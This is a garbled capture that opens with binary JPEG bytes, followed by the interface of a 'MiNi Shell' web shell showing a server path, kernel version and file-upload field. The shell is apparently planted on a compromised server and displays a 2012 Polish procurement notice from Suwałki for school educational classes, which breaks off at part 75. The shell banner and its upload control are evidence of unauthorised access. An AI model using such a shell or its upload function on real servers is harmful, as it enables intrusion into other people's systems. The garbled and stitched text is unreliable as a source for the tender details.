JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120202/32428-N-2012.html

<p class="kh_header"><b>Suwałki: Wykonanie usług edukacyjnych w ramach projektu pn. Otwarty umysł - drogą do sukcesu</b><br>
<b>Numer ogłoszenia: 32428 - 2012; data zamieszczenia: 02.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Suwałki , ul. Mickiewicza 1, 16-400 Suwałki, woj. podlaskie, tel. 087 5628000, faks 087 5628098.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług edukacyjnych w ramach projektu pn. Otwarty umysł - drogą do sukcesu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług edukacyjnych w 5 szkołach gimnazjalnych na terenie Miasta Suwałki. Przedmiot zamówienia jest związany z realizacją przez Gminę Miasto Suwałki projektu pn. Otwarty umysł - drogą do sukcesu dofinansowanego z Programu Operacyjnego Kapitał Ludzki, Działania 9.1 Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Zamówienie podzielone jest na 85 części i obejmuje przeprowadzenie następujących zajęć: 

Część 1
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów
/-nnic w Gimnazjum nr 1 w Suwałkach - Język angielski:
Liczba godzin: 47
Termin realizacji:  II-VI 2012 r. (16 godzin), IX-XII 2012 r. (14 godzin), I-VI 2013 r. (17 godzin)
Ilość osób w grupie: maks. 12

Część 2
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów
/-nnic w Gimnazjum nr 1 w Suwałkach - Panel matematyczno-informatyczny:
Liczba godzin: 41
Termin realizacji:  II-VI 2012 r. (16 godzin), IX-XII 2012 r. (14 godzin), I-VI 2013 r. (11 godzin)
Ilość osób w grupie: maks. 14

Część 3
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów
/-nnic w Gimnazjum nr 1 w Suwałkach - Panel przyrodniczy:
Liczba godzin: 47
Termin realizacji:  II-VI 2012 r. (16 godzin), IX-XII 2012 r. (14 godzin), I-VI 2013 r. (17 godzin)
Ilość osób w grupie: maks. 12

Część 4 
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów
/-nnic w Gimnazjum nr 1 w Suwałkach - Panel poznawczo-naukowy
Liczba godzin: 16
Termin realizacji:  II-VI 2012 r. (16 godzin)
Ilość osób w grupie: maks. 12

Część 5 
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów
/-nnic w Gimnazjum nr 1 w Suwałkach - Panel poznawczo-naukowy
Liczba godzin: 20
Termin realizacji:  II-VI 2012 r. (20godzin)
Ilość osób w grupie: maks. 12

Część 6
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów
/-nnic w Gimnazjum nr 1 w Suwałkach - Panel poznawczo-naukowy
Liczba godzin: 36
Termin realizacji:  IX- XII 2012 r. (36 godzin)
Ilość osób w grupie: maks. 12

Część 7 
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów
/-nnic w Gimnazjum nr 1 w Suwałkach - Panel poznawczo-naukowy
Liczba godzin: 30
Termin realizacji:  I- VI 2012 r. (30godzin)
Ilość osób w grupie: maks. 14

Część 8
Doradztwo zawodowe w Gimnazjum nr 1 w Suwałkach:
Liczba godzin: 12
Termin realizacji: II-VI 2012 r. (4 godzin), IX-XII 2012 r. (3 godzin), I-VI 2013 r. 
(5 godzin)
Ilość osób w grupie: maks. 12

Część 9
Doradztwo zawodowe w Gimnazjum nr 1 w Suwałkach:
Liczba godzin: 12
Termin realizacji: II-VI 2012 r. (4 godzin), IX-XII 2012 r. (3 godzin), I-VI 2013 r. 
(5 godzin)
Ilość osób w grupie: maks. 12

Część 10
Doradztwo zawodowe w Gimnazjum nr 1 w Suwałkach:
Liczba godzin: 12
Termin realizacji: II-VI 2012 r. (4 godzin), IX-XII 2012 r. (4 godzin), I-VI 2013 r. 
(4 godzin)
Ilość osób w grupie: maks. 12

Część 11
Doradztwo zawodowe w Gimnazjum nr 1 w Suwałkach:
Liczba godzin: 12
Termin realizacji: II-VI 2012 r. (4 godzin), IX-XII 2012 r. (4 godzin), I-VI 2013 r. 
(4 godzin)
Ilość osób w grupie: maks. 14

Część 12
Zajęcia dodatkowe, rozwijające zainteresowania artystyczne uczniów w Gimnazjum nr 1 w Suwałkach - Zajęcia teatralne
Liczba godzin: 46
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (14 godzin), I-VI 2013 r. 
(16 godzin)
Ilość osób w grupie: maks. 12

Część 13
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 2 w Suwałkach - Matematyka
Liczba godzin: 20
Termin realizacji: II-VI 2012 r. (20 godzin)
Ilość osób w grupie: maks. 10 

Część 14
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 2w Suwałkach - Matematyka
Liczba godzin: 20
Termin realizacji: I-VI 2013 r. (20 godzin)
Ilość osób w grupie: maks. 10 

Cześć 15
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 2 w Suwałkach - Fizyka
Liczba godzin: 10
Termin realizacji: IX - XII 2012 r. (10 godzin)
Ilość uczniów w grupie: 10

Część 16
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 2 w Suwałkach - Chemia
Liczba godzin: 10
Termin realizacji: IX - XII 2012 r. (10 godzin)
Ilość uczniów w grupie: 10

Część 17
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 2 w Suwałkach - Geografia
Liczba godzin: 10
Termin realizacji: I - VI 2013 r. (10 godzin)
Ilość uczniów w grupie: 10

Część 18
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 2 w Suwałkach - Informatyka
Liczba godzin: 16
Termin realizacji: II - VI 2012 r. (16 godzin)
Ilość uczniów w grupie: 10

Część 19
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów/-nnic Gimnazjum nr 2 w Suwałkach - Informatyka
Liczba godzin: 16
Termin realizacji: IX - XII 2012 r. (16 godzin)
Ilość uczniów w grupie: 10

Część 20
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 2 w Suwałkach - Język angielski
Liczba godzin: 20
Termin realizacji: II - VI 2012 r. (20 godzin)
Ilość uczniów w grupie: 10

Część 21
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów/-nnic Gimnazjum nr 2 w Suwałkach - Język angielski
Liczba godzin: 20
Termin realizacji: I-VI 2013 r. (20 godzin)
Ilość uczniów w grupie: 10

Część 22
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 2 w Suwałkach - Przyroda
Liczba godzin: 10
Termin realizacji: II-VI 2012 r. (10 godzin)
Ilość uczniów w grupie: 10

Część 23
Doradztwo zawodowe w Gimnazjum nr 2 w Suwałkach
Liczba godzin: 3
Termin realizacji: IX-XII 2012 r. (3 godziny)
Ilość uczniów w grupie: 30

Część 24
Doradztwo zawodowe w Gimnazjum nr 2 w Suwałkach
Liczba godzin: 3
Termin realizacji: IX-XII 2012 r. ( 3 godziny)
Ilość uczniów w grupie: 30

Część 25
Doradztwo zawodowe w Gimnazjum nr 2 w Suwałkach
Liczba godzin: 3
Termin realizacji: IX-XII 2012 r. ( 3 godziny)
Ilość uczniów w grupie: 30

Część 26
Doradztwo psychologiczno - pedagogiczne dla uczniów sprawiających trudności wychowawcze w Gimnazjum nr 2 w Suwałkach
Liczba godzin: 12
Termin realizacji: I-VI 2013 r. ( 12 godzin)
Ilość uczniów w grupie: 10

Część 27
Doradztwo psychologiczno - pedagogiczne dla uczniów sprawiających trudności wychowawcze w Gimnazjum nr 2 w Suwałkach
Liczba godzin: 12
Termin realizacji: I-VI 2013 r. ( 12 godzin)
Ilość uczniów w grupie: 10

Część 28
Zajęcia dodatkowe, rozwijające zainteresowania artystyczne (teatralne, z fotografii, taneczne) uczniów w Gimnazjum nr 2 w Suwałkach - zajęcia taneczne
Liczba godzin: 30
Termin realizacji: IX-XI 2012 r. ( 30 godzin)
Ilość uczniów w grupie: 12

Część 29
Zajęcia dodatkowe, rozwijające zainteresowania artystyczne (teatralne, z fotografii, taneczne) uczniów w Gimnazjum nr 2 Suwałkach - zajęcia z fotografii
Liczba godzin: 20
Termin realizacji: IX-XI 2012 r. ( 20 godzin)
Ilość uczniów w grupie: 10

Część 30
Zajęcia dodatkowe, rozwijające zainteresowania artystyczne (teatralne, z fotografii, taneczne) uczniów w Gimnazjum nr 2 w Suwałkach - zajęcia teatralne
Liczba godzin: 20
Termin realizacji: IX-XI 2012 r. ( 10 godzin), I-VI 2013 r. (10 godzin)
Ilość uczniów w grupie: 15

Część 31
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Matematyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 32
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Matematyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 33
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Matematyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 34
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Matematyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 35
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Matematyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 36
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Matematyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 37
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Matematyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 38
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów  Gimnazjum nr 3 w Suwałkach- Matematyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 39
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Geografia
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 40
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Geografia
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 41
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Chemia
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 42
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Chemia
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 43
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Biologia
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 44
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Biologia
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 45
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Fizyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 46
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Fizyka
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 47
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język angielski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 48
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język angielski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 49
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język angielski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 50
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język angielski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 51
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język angielski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 52
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język angielski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 53
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język angielski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14


Część 54
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język angielski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 55
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język polski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 56
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język polski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 57
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język polski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 58
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język polski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 59
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język polski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 60
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język polski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 61
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język polski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 62
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Język polski
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 63
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Historia i WOS
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 64
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 3 w Suwałkach - Historia i WOS
Liczba godzin: 50
Termin realizacji: II-VI 2012 r. (16 godzin), IX-XII 2012 r. (16 godzin), I-VI 2013 r. 
(18 godzin)
Ilość osób w grupie: maks. 14

Część 65
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 5 - Matematyka
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 10

Część 66
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 5 - Fizyka
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 6

Część 67
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 5 - Chemia
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 6

Część 68
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 5 - Geografia
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 6

Część 69
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 5 - Biologia
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 6

Część 70
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 5 - Język polski
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 10

Część 71
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 5 - Historia
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 10

Część 72
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 5 - Wiedza o społeczeństwie
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 10

Część 73
Zajęcia rewalidacyjne w Gimnazjum nr 5 w Suwałkach 
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 4

Część 74
Zajęcia socjoterapeutyczne w Gimnazjum nr 5 w Suwałkach 
Liczba godzin: 57
Termin realizacji: II-VI 2012 r. (18 godzin), IX-XII 2012 r. (18 godzin), I-VI 2013 r. 
(21 godzin)
Ilość osób w grupie: maks. 10

Część 75
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 7- Przedsiębiorczość
Liczba godzin: 60
